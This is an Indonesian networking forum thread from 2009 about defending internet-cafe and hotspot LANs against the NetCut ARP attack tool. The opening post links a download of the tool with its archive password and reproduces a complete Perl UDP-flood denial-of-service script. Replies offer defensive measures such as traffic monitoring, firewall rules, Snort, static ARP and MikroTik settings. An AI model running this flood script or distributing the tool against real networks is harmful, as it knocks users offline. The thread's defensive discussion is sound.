1 (edited by artasena 27-02-2009 23:32:39)

Topic: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

Tiga (3) hari lebih ini saya dibuat pusing dengan adanya sebuah program yang mampu bikin "KO" semua client dan router di warnet yang saya tangani, namanya "NetCut".

========================================================

Program ini dapat di Download Disini : http://www.ziddu.com/downloadlink/3657554/NetCut2.0.zip

password : blackarch

========================================================

Dengan program ini, maka seseorang bisa dengan mudahnya menguasai bandwith jaringan  LAN atau HotSpot (Cukup dengan Cut Off pada menunya), dan akibatnya warnet yang saya tangani terkadang suka sepi, dan parahnya di tempat saya, dah banyak yang pakai program ini.

Yang ingin saya utarakan dan saya tanyakan buat rekan-rekan, bagaimana caranya mengatasi serangan yang ditimbulkan dari program ini, dari sisi Mikrotik Router, dan dari sisi Client, karena tools yang satu ini, didesain untuk berfungsi pada kedua maksud tersebut.

Mohon jawaban, informasi, opini dan lainnya ? Agar kita semua bisa mengantisipasi efek program ini yang bisa menimpa kita kelak ?

Oh ya sebagai tambahan, efek program NetCut ini mirip seperti efek Denial Of Service dari Script Perl di bawah ini :

"(ddos.pl)"

===== START HERE =====

#!/usr/bin/perl
##############################################################
# Denial Of Service
# Script by UnderSTART.ru
#############################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Script by UnderSTART.ru";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

===== END HERE =====

http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_sony_ps3.gif
http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_nintendo_wii.gif

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

kalo ga salah tool ini bisa mencegah supaya ga bisa putus internetnya yah... cuma denger aa seh blom prakteknya

Sharing ilmu yukkk

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

esnu wrote:

kalo ga salah tool ini bisa mencegah supaya ga bisa putus internetnya yah... cuma denger aa seh blom prakteknya

Bisa dibilang iya bisa dibilang enggak bro, sekarang saya lagi coba penetrasi mencari solusi atas permasalahan diatas, makanya biar lebih ringan dan siapa tau ada yagn lebih ngerti.

Biar kita bisa sam-sama saling jaga dan saling mengingatkan big_smile

http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_sony_ps3.gif
http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_nintendo_wii.gif

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

halo artasena,

netcut? baru dengar sih - cuma program ini bisa di-eksekusi oleh non-root user kah?
kalo bisa di-eksekusi oleh non root user berarti memang agak rumit,
kalo tidak bisa dieksekusi oleh non root user - berarti masih bisa ditanggulangi.

kesimpulan : silahkan cek aja dulu RBAC-nya.

HTH.

5 (edited by opikdesign 27-02-2009 18:53:25)

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

@abdi_wae
sifatnya DDOS.... dia bisa jalan di non root user...
warnet sy pernah kena tp namanya bukan netcut, ntah apa sy lupa....
dia gak bisa buka b/w management tp dia mengambil jatah client yg lain klo dilihat dr itop.

@artasena
sy sih gak bisa menanggulangi tp bisa mantau siapa yg makai kecurangan kayak gini,
coba dipantau aja dgn itop ato iptraf, krn real, nanti ketahuan b/w pada lari kemana, nah tangkap aja tuh orangnya.....

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

6 (edited by si_faisal 27-02-2009 20:30:16)

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

iya, coba monitor via jaringan menggunakan iftop/iptraf
kemudian mainkan iptables nya dengan mereject paket yang datang dari arah penyerang (chain INPUT, tabel filter ) men-DROP paket yang keluar ke arah penyerang (chain OUTPUT, tabel filter)

coba optimakan /etc/sysctl.conf untuk lebih tahan terhadap serangan denial

smile
mudah2 an bisa diatasi ya
kalo enggak, langsung aja labrak orangnya barengan bang opik big_smile heheh..

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

@ bung opik,

sifatnya DDOS.... dia bisa jalan di non root user...

sebuah percobaan yg bagus smile
tapi sayang - masih belum menjawab apakah bisa dijalankan oleh non-root user?
unix/linux dibangun lumayan sangat kuat untuk masalah ini - terutama yg bisa menjalankan kernel application/termasuk socket.

DDoS hanya sebuah istilah - bukan sebuah perangkat. perangkatnya adalah tag berikut :

===== START HERE =====

#!/usr/bin/perl
##############################################################
# Denial Of Service
# Script by UnderSTART.ru
#############################################################

use Socket;

jadi bila si admin memberi restricted shell - atau firewall yg bagus pada sistem-nya, dia tidak akan minimal bisa dieksekusi/keluar dari interface.

faisal dapat poin 10 untuk sisi firewalling-nya smile

ingat bahwa keamanan jaringan tidak selalu pada jaringannya - tapi lebih penting untuk mengamankan end-user atau resource yg paling berpotensi untuk merusak (termasuk aplikasi dsb).

HTH.

8 (edited by opikdesign 27-02-2009 21:37:03)

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

@abdi_wae
iya, bisa dijalankan di non root user, klo kejadian ditempat sy saat itu loh,klo yg ini gak tahu deh.

biasanya sy cuman nge-blok / firewall ke luarnya klo kedalamnya lost aja sih, bener juga kata faisal. Jadi klo kena DDOS dr dalam yah langsung keblabasan.


@si_faisal
iya, dulu staff ku aku suruh pake iftop dan dilihat b/w yg langsung menyedot, IP brapa dan ketahuan PC nomer brapa datangin langsung di labrak. ato lepas aja kabel LAN-nya... klo pake wifi langsung di blok MAC ADD, mau gak mau dia pasti tanya kenapa koq gak bisa connect saat itu langsung dilabrak tanpa perlu kita yg datang kemeja/rumahnya.... lol lol big_smile

iftop/iftraf bagusnya real time.... tapi apakah kita slalu memantau duduk berjam2 di depan monitor?!

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

artasena wrote:

Program ini dapat di Download Disini : http://www.ziddu.com/downloadlink/3657554/NetCut2.0.zi=

mana password buat extract file tersebut?!

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

opikdesign wrote:
artasena wrote:

Program ini dapat di Download Disini : http://www.ziddu.com/downloadlink/3657554/NetCut2.0.zi=

mana password buat extract file tersebut?!

Oh iya lupa sorry, Passwordnya : blackarch

buat ngebukanya.

http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_sony_ps3.gif
http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_nintendo_wii.gif

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

opikdesign wrote:

@abdi_wae
iya, bisa dijalankan di non root user, klo kejadian ditempat sy saat itu loh,klo yg ini gak tahu deh.

biasanya sy cuman nge-blok / firewall ke luarnya klo kedalamnya lost aja sih, bener juga kata faisal. Jadi klo kena DDOS dr dalam yah langsung keblabasan.


@si_faisal
iya, dulu staff ku aku suruh pake iftop dan dilihat b/w yg langsung menyedot, IP brapa dan ketahuan PC nomer brapa datangin langsung di labrak. ato lepas aja kabel LAN-nya... klo pake wifi langsung di blok MAC ADD, mau gak mau dia pasti tanya kenapa koq gak bisa connect saat itu langsung dilabrak tanpa perlu kita yg datang kemeja/rumahnya.... lol lol big_smile

iftop/iftraf bagusnya real time.... tapi apakah kita slalu memantau duduk berjam2 di depan monitor?!

Wah, solusi diatas boleh juga nih, ok akan saya coba, tapi saya jadi kepikiran, buat gimana caranya atau ada program yang bisa saya install buat ngeblokir program ini, kalo dari ngeblokir dari sisi billing warnet, biasanya, gampang diakalin sama orang yang ngerti, seperti "me-rename" program yang dimaksud, untuk kemudian dieksekusi oleh sang attacker.

Btw, untuk semua saran dan solusinya saya ucapkan terima kasih. smile buat rekan-rekan semuanya.

http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_sony_ps3.gif
http://www.xpango.com/fe/img/cnt/how_it_works/webmasters/xpango_banner_nintendo_wii.gif

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

mudah sebenrnya.... komputer client account loginnya user aja jadi mereka gak bisa install apa2....

lakukan firewall seperti yg dibilang mas si_faisal.

CMIIW

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

instalasi IDS seperti Snort bisa memudahkan tugas admin, dia akan melakukan monitoring terhadap aktifitas jaringan. jika kita setup IDS nya berperan sebagai Active Firewall, maka umumnya dia bisa mengetahui dan mengambil aksi pada serangan2 DOS. jadi nggak perlu ditunguin 24 jam bang

big_smile
paling2 kita monitoring log nya aja

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

sip.... 100 untuk mas si_faisal.... sy sih biasa pakai snort.... bisa update lagi.... big_smile

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

kalau dari sisi mikrotik g mana kk??
apa yg bisa di lakukan untuk menangani masalh ini ??

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

coba di clientnya dipasang seperti program anti-exe, dan hanya boleh mengeksekusi program2 yang terdaftar smile

cmiiw

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

Maaf bro.., fungsi NetCut sebenarnya itu apa sih?
Apakah ia mengalihkan b/w ke komputer kita, atau memutuskan koneksi komputer yang lain?

Thanks..

115  105  107  111  101  109  97  110

18 (edited by boyrobbie 23-04-2009 00:13:25)

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

fufu wrote:

kalau dari sisi mikrotik g mana kk??
apa yg bisa di lakukan untuk menangani masalh ini ??

di queue setiap ip client..
dijatahin masing2,
jadi percuma dia pakai netcut/WinArpAttacker/CainAbel,,
wong ujung selangnya dikasi bw segitu ya segitu jg.,,
.
jgn lp di set arp table nya jadi static,,
ini mencegah aksi sniffing,,
tar dsitu ketauan kl ada penyusup masukk big_smile

------------------
99% music

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

boyrobbie wrote:
fufu wrote:

kalau dari sisi mikrotik g mana kk??
apa yg bisa di lakukan untuk menangani masalh ini ??

di queue setiap ip client..
dijatahin masing2,
jadi percuma dia pakai netcut/WinArpAttacker/CainAbel,,
wong ujung selangnya dikasi bw segitu ya segitu jg.,,
.
jgn lp di set arp table nya jadi static,,
ini mencegah aksi sniffing,,
tar dsitu ketauan kl ada penyusup masukk big_smile

program ioni (NetCut) masih bisa menembus limiter dr b/w management krn sifatnya dia merusak (DDOS) settingan yg ada.

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

fufu wrote:

kalau dari sisi mikrotik g mana kk??
apa yg bisa di lakukan untuk menangani masalh ini ??

click me

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

/ip firewall filter chain=input protocol=icmp action=drop
/interface ethernet set ether1 arp=reply-only

hmm kira2 ada dampak lain yg timbul ga, setelah kita lakukan cara diatas..
takudnya muncul masalah baru lg..

------------------
99% music

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

skarang udah ada antinetcut
smile

23 (edited by opikdesign 25-04-2009 11:49:01)

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

si_faisal wrote:

skarang udah ada antinetcut
smile

share disini dong big_smile

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

Kalo client hotspotnya clone MAC address gimana dong ngeblocknya? yang punya MAC asli kan bisa ngamuk?

Makassar Air Traffic Service Center === Your green flight path

Re: Bagaimana mengatasi Tools Netcut dalam jaringan HotSpot dan LAN ?

didik_atc wrote:

Kalo client hotspotnya clone MAC address gimana dong ngeblocknya? yang punya MAC asli kan bisa ngamuk?

gampang mas, pakai server khan?!
buat IP & MAC Filter di server, jadi filternya selain MAC juga IP, klo ada yg clone MAC biarpun IP gak sesuai maka gak bakal bisa connect ke server, sedangkan klo IP disamakan maka akan terjadi konflik IP semacam duplicate IP akhirnya yg membajak dan aslinya gak bisa connect ke server, klo dah begini IP untuk client aslinya bisa dirubah.

HTH

Facebook OPiKdesign
http://badge.facebook.com/badge/100000147194199.279.411965916.png
* IT Consultant * Networking Specialist for Internet Cafe/HotSpot/SOHO * Maintenance * Graphic & Web Design, 3D Modeling & 2D/3D Animation * Hosting & Domain * email to: th@opikdesign.com